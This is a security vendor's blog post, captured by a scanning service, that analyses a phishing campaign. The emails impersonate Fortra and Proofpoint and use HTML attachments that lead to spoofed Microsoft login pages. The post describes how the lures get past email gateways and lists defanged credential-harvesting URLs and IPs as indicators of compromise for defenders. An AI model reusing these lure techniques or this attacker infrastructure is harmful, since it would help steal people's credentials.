cofense.com Open in urlscan Pro
141.193.213.20  Public Scan

Form analysis
0 forms found in the DOM

Text Content

 * Blog
 * Customer Resource Center
 * Contact Support
 * Contact Us

Menu
 * Blog
 * Customer Resource Center
 * Contact Support
 * Contact Us

 * Stop Threats
   
   End-to-End Email Security
   
   Defend your organization with a complete email security solution designed to
   identify, protect, detect & respond to threats.
   
   Security Awareness Training
   
   Condition your workforce against today’s latest threats and transform them
   into your front line of defense.
   
   Global Intelligence Network
   
   Protect your organization with our deep analysis into the current threat
   landscape and emerging trends.
   
   Cofense vs. The Competition
   
   See why the Cofense Intelligent Email Security suite stands out against the
   competition 
   
   Business Email Compromise (BEC)
   
   BEC amounts to an estimated $500 billion-plus annually that’s lost to fraud.
   Ensure your business is protected.
   
   Ransomware & Malware
   
   Phishing is the #1 attack vector for ransomware attacks. Stop phishing
   attacks in their tracks.
   
   Credential Theft
   
   Protect your user’s credentials and avoid a widespread, malicious attack.

 * Solutions
   
   Email Security for the Enterprise
   
   Complete threat protection, detection and response tailored for enterprise
   businesses.
   
   Email Security for the Mid Market
   
   Security awareness training + email security protection purpose-built for
   your mid-market organizations.
   
   Email Security for Managed Service Providers (MSPs)
   
   Best-in-Class Phishing Protection and Simulations designed for MSPs, from the
   ground up.
   
   Managed Email Security Solutions
   
   Protect your organization from attacks with managed services from the Cofense
   Phishing Defense Center™.
   
   Detect and Stop Attacks
   
   Automatically identify and quarantine email threats across your organization
   in minutes.
   
   Analyze & Remediate Reported Threats
   
   Accelerate threat detection and response, empowering fast resolution.
   
   Actionable Insight into Emerging Threats
   
   Protect your organization with our deep analysis into the current threat
   landscape and emerging trends.
   
   Security Awareness Training
   
   Condition your workforce against today’s latest threats and transform them
   into your front line of defense.
   
   Security Awareness Training + Threat Protection
   
   Growing companies can get protection, realistic simulations and security
   awareness training all in one platform.
   
   Easily Report Suspected Threats
   
   Report suspicious threats with just one click.
   
   Empower Your Team
   
   Train employees through an with award-winning Learning Management System.

 * Clients
   
   Industries We Serve
   
   Businesses from all industries rely on Cofense to safeguard their teams.
   
   What Our Customers Say
   
   Global organizations trust Cofense to protect their most critical assets.

 * Resources
   
   Knowledge Center Hub
   
   Check out our resource library of solution content, whitepapers, videos and
   more.
   
   Events & Webinars
   
   Come see us at a local event or join us at an upcoming webinar.
   
   Blog
   
   Stay current on cybersecurity trends, market insights and Cofense news.
   
   Check Your SEG
   
   See the real threats that are currently evading your Secure Email Gateway
   (SEG).

 * About
   
   About Cofense
   
   Cofense stops email security threats and protects your company through our
   network of 35+ Million human reporters.
   
   News Center
   
   See the latest articles, press releases and more in our news center.
   
   Awards
   
   It’s an honor to be recognized in the cybersecurity market. Check out our
   recent awards.
   
   Partners
   
   Grow your business, drive new revenue streams, and improve your competitive
   posture through our Partner Program.
   
   Careers
   
   We’re looking for passionate people to join us in our mission to stop all
   email security threats for organizations around the globe.
   
   Management Team
   
   Get to know our management team.

X

Get a Demo



THREAT ACTORS IMPERSONATE EMAIL SECURITY PROVIDERS TO STEAL USER CREDENTIALS

 * May 17, 2023

Home » Blog » Threat Actors Impersonate Email Security Providers to Steal User
Credentials

Share Now

Facebook
Twitter
LinkedIn

SEGs Bypassed: Microsoft, Trend Micro, IronPort

By Shirish Lavania, Cofense Phishing Defense Center

In today’s world, each and every organization use email security to secure their
infrastructure as email is a common entry point for attackers used for spreading
phishing attacks, malwares and other types of threats. To this end, adversaries
are continuously trying to bypass secure email gateways to carry out their
attacks. Threat actors often disguise harmful URLs within HTML attachments,
which makes it more challenging for Secure Email gateways (SEGs) to block them.
The Phishing Defence Centre (PDC) analysed a phishing campaign impersonating
email security provider to lure recipients into providing their user credentials
via malicious HTML attachment.



Figure 1: Email Body

Figure 1 shows the user received an email from Forta, which is likely a
misspelling of Fortra. The subject mentions an “essential encrypted company
email” and a fake green banner states that the “sender is verified”, in an
attempt from the sender to trick the user to click on the attachment. The email
instructs the user authenticate with credentials in order to view the secure
attached document.



Figure 2: HTML File

The attachment in the email shows that the adversaries wanted to make it look
legitimate by naming the html as “Secure_FortraATT_2736614.html” which is inside
the “Attachment.zip” folder as seen in figure 2.



Figure 3: Email Body

In Figure 3 we see a similarly styled email that shows Fortra as the sender but
makes mention of Proofpoint. The attacker tried to create a false sense of
security to convince the user by including the footer “Secured by Proofpoint
encryption”.
It is not uncommon for threat actors to use impersonation tactics in order to
trick users into believing that an email is genuine.

Once the user clicks on the attachment, it presents a spoofed Microsoft login
page with a Microsoft logo on it to make it more familiar to the user as seen in
figure 4.



Figure 4: Fake Microsoft Landing Page

In figure 5, the threat actor styled the spoofed page as if it was a production
login page.



Figure 5: Fake Production Login Page

Once the users login, the credentials are exfiltrated to the malicious URLs
hxxps://office[.]topexecs[.]info/ for figure 4 and
hxxps//library-query[.]info/login[.]php for figure 5.

This campaign unveils that the attackers are constantly improving their
techniques to lure users and bypass security measures in order to steal useful
information. Unfortunately, security solutions such as SEGs may not always be
effective in stopping attachment threats and users end up opening them. An
attentive user with the help of Cofense Reporter alerted us about this campaign
upon realizing that this phishing email is asking for sensitive information.

Indicators of Compromise IP hxxps//library-query[.]info/login[.]php
138.201.134.162 hxxps://office[.]topexecs[.]info/ 84.247.51.110
74.119.239.234


READ MORE RELATED PHISHING BLOG POSTS


COFENSE IS RECOGNIZED IN THE FEBRUARY 2023 GARTNER® MARKET GUIDE FOR EMAIL
SECURITY

Read More »
February 22, 2023


URLS 4X MORE LIKELY THAN PHISHING ATTACHMENTS TO REACH USERS

Read More »
February 23, 2023


THREAT ACTORS ABUSE ATLASSIAN, BYPASS MULTIPLE SECURE EMAIL GATEWAYS (SEGS)

Read More »
February 24, 2023

1602 Village Market Blvd, SE #400
Leesburg, VA 20175

(888) 304-9422

Facebook-f Twitter Linkedin Youtube


COMPANY

 * What We Do
 * How We Do It
 * About
 * Contact Us
 * Legal
 * Privacy Policy


RESOURCES

 * Knowledge Center Hub
 * Events & Webinars
 * Blog
 * Check Your SEG
 *  
 *  

Get a Demo
©2023 Cofense. All rights reserved.

This site is registered on wpml.org as a development site.


We use our own and third-party cookies to enhance your experience by showing you
relevant content, personalizing our communications with you, and remembering
your preferences when you visit our website. We also use them to improve the
overall performance of our site. You can learn more about the cookies and
similar technology we use by viewing our privacy policy. By clicking ‘Accept,’
you acknowledge and consent to our use of all cookies on our website.

Accept